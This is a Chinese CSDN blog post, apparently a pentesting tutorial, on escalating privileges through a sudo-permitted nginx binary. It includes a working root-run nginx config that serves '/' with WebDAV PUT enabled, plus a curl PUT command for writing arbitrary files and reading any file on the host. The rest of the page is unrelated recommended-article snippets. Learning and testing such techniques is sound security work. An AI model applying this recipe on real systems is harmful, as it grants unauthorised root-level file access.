Nginx配置漏洞利用(后渗透)- sudo nginx

最新推荐文章于 2024-10-11 19:08:06 发布
最新推荐文章于 2024-10-11 19:08:06 发布
阅读量154 收藏
点赞数 1
文章标签: nginx 运维 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43750882/article/details/142072413
版权 
如果普通用户可以以更高权限的用户执行nginx命令,拥有sudo权限,
比如,查看sudo权限:
sudo -l
...
(ALL : ALL) NOPASSWD: /usr/sbin/nginx

可以利用nginx配置文件实现提权。
具体来说,如果可以以root身份运行nginx,就可以利用nginx配置文件做到把任意文件上传到主机的任意位置,或者下载和读取任意文件。

使用如下命令指定nginx配置文件
nginx -c /file/to/configration_file

nginx配置文件可以这样写:
nginx.config
----------------------------------------
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
        worker_connections 768;
}
http {
        server {
                listen 1339;
                root /;
                autoindex on;
                dav_methods PUT;
        }
}
----------------------------------------
配置文件指定了监听端口是1339,指定了nginx的根目录是/,启用了PUT方法。

此时如果可以从其他主机访问,或者从目标主机本地访问,可以进行这样的文件上传操作:
curl -X PUT -T /file/to/upload_file http://IP:1339/dir/file
把本地的upload_file文件上传到目标主机。
同时也可以直接下载目标主机上的文件,只要可以访问到。
ccOCONuTT
关注
安全渗透测试解决方法以及使用nginx进行解决
qq_45621643的博客
12-07 2664
线上安全环境维护
nginx上传下载之nginx-upload-module-2.3.0
10-15
cp -r ../nginx-upload-module-2.3.0 nginx-1.21.x/ cd nginx-1.21.x/ ./configure --add-module=../nginx-upload-module-2.3.0 \ --prefix=/usr/local/nginx \ --with-http_ssl_module \ --with-pcre make ...
nginx-1.23.4安装服务启动
05-03
3. **配置测试**:如果需要修改Nginx配置文件(通常位于`/etc/nginx/nginx.conf`),记得先使用`sudo nginx -t`测试配置文件的正确性,避免因错误配置导致服务无法启动。 4. **停止与重启**:若需停止服务,用`sudo...
ubuntu 20.04 离线安装Nginxnginx-full-1.18.0)及相关依赖
11-14
sudo dpkg -i /path/to/nginx-full_1.18.0_amd64.deb ``` 在安装过程中可能会遇到依赖关系未满足的情况,如果出现错误提示,可以使用`apt-get`或`dpkg --force-depends`来解决: ```bash sudo apt-get install -f ...
nginx-http-hsts:Nginx 模块添加适当的 Strict-Transport-Security 标头
05-30
$ tar zxvf nginx-1.x.x.tar.gz 解压缩摘要模块的源代码: $ unzip master.zip 切换到包含 nginx_ 源的目录,使用所需的选项运行配置脚本,并确保放置一个--add-module标志指向包含摘要模块源的目录: $ cd nginx-...
centos8 nginx1.20.1 与nginx配置文件
05-03
现在,我们可以下载Nginx的源代码包`nginx-1.20.1.tar.gz`。你可以通过wget或者浏览器将文件下载到本地,然后解压: ```bash wget http://nginx.org/download/nginx-1.20.1.tar.gz tar -zxvf nginx-1.20.1.tar.gz cd...
Linux 命令:每日一学,参数传递之xargs命令实践
WeiyiGeek 唯一极客IT知识分享
10-11 580
描述:上一章,我们学习了Linux中查找搜寻文件或目录的相关命令,此章我们学习常常与find命令联合使用,以及在Shell脚本中常用的参数替换 xargs 命令进行实践学习,从而实现更加强大的参数传递和多进程并行执行Linux命令或脚本等Linux 命令:每日一学,参数传递之xargs命令实践此Linux 命令 | 系列文章将作为《#运维从业必学。
国外电商系统开发-运维系统文件下载
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
10-08 211
国外电商系统开发-运维系统文件下载
在虚拟机里试用了几个linux操作系统
shencz2000的专栏
10-09 305
试了debian12,ubuntu20.4,ubuntu22.4,ubuntu24.4,deepin。其中ubuntu20.4使用时没有出现死机现象。在虚拟机里试用了几个操作系统。有时候出现死机现象,有的不能播放视频。有的显示效果不太好。虚拟机软件是VMware 17。
2024 kali系统2024版本,可视化界面汉化教程(需要命令行更改),英文版切换为中文版,基于Debian创建的kali虚拟机
m0_47484034的博客
10-11 144
2024 kali系统2024版本,可视化界面汉化教程(需要命令行更改),英文版切换为中文版,基于Debian创建的kali
C++面试速通宝典——17
小飞猪的博客
10-08 974
面试速通宝典——17
【Linux】段错误(核心已转储)
最新发布
冰恋云的专栏
10-11 97
刚做的新系统,1、内存还没用了 2.磁盘空间也肯没问题,刚做的,啥也没安装了。3.文件系统直接都好好的,就安装了软件,系统文件就能坏了?4.查看selinux,selinux也没问题 配置文件。5.那就是二进制文件损坏?查看slinux getenforce。直接查看 getenforce。命令的二进制文件可能损坏或不完整。安装完再添加用户就好了。
安装虚拟机
qq_35227244的博客
10-10 275
记录安装虚拟机全过程
另一个ssh server, handy-sshd
闲人的专栏
10-11 434
是一个轻量级、高性能的 SSH 服务器解决方案,旨在为开发者和系统管理员提供便捷的远程访问功能。它基于现代加密技术,确保数据传输的安全性和保密性。Handy-SSHD 具有简单易用的配置选项,支持多种认证方式,包括密码和公钥认证,使用户能够灵活选择适合其需求的安全机制。该工具以模块化的设计理念构建,支持多种扩展功能,包括会话记录、用户管理和访问控制等,适合于不同规模的应用场景。其轻量级特性确保了在资源有限的环境中仍能保持出色的性能,特别适合嵌入式系统和小型服务器。
kubernetes集群公共服务 Harbor
Java_fenxiang的博客
10-05 1037
首先,还是需要新创建一个虚拟机,就像之前一样,然后启动虚拟机,设置主机名和网络,网关,DNS等。接下来检查防火墙,selinux是否关闭,以及是否做了时钟同步。一、 docker-ce安装1.1 获取YUM源使用阿里云开源软件镜像站。登录后复制 # wget https://mirrors.aliyun.com/dock...
服务器虚拟化的详细学习要点
2401_87352036的博客
10-05 695
以上内容仅供参考,学习服务器虚拟化涉及的技术和工具时,请确保从可靠的来源获取最新信息,并根据实际情况进行调整和应用。优势:掌握服务器虚拟化在提高资源利用率、增强灵活性和可扩展性、简化管理、提高安全性、支持高可用性等方面的优势。技术融合:了解服务器虚拟化将与存储虚拟化、网络虚拟化等技术深度融合,形成一体化的虚拟化解决方案。虚拟化层次:理解虚拟化的不同层次,如裸机虚拟化(Type 1)和托管虚拟化(Type 2)。虚拟机(VM):了解虚拟机是服务器虚拟化的基本单元,包含独立的操作系统、应用程序和资源配置
搭建k8s集群服务(kubeadm方式)
qq_27683317的博客
10-03 1452
在任意从节点上执行kubectl都会报错,原因是从节点执行命令需要链接主节点的api-server,但是从节点并不知道api-server的访问地址。如果token过期了,用命令重新生成:kubeadm token create --ttl 0 --print-join-command。sed -i 's/enforcing/disabled/' /etc/selinux/config #永久关闭。sed 's/.swap./#&/' /etc/fstab #永久。# 直接复制控制台上的几条命令执行。
搭建安全的分析环境
信息安全
10-08 522
分析恶意软件,动态行为分析是必不可少的一步,所有样本都必须在虚拟环境中执行,不可在主机上执行。因此,我们要需要搭建供动态分析的环境以及防止在主机运行的环境。
nginx配置access-control-allow-origin
07-15
可以使用命令sudo service nginx reload或sudo systemctl reload nginx来重新加载配置文件。 通过以上配置nginx可以实现access-control-allow-origin的功能,从而允许指定的域名跨域访问服务器资源。 ### 回答3...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值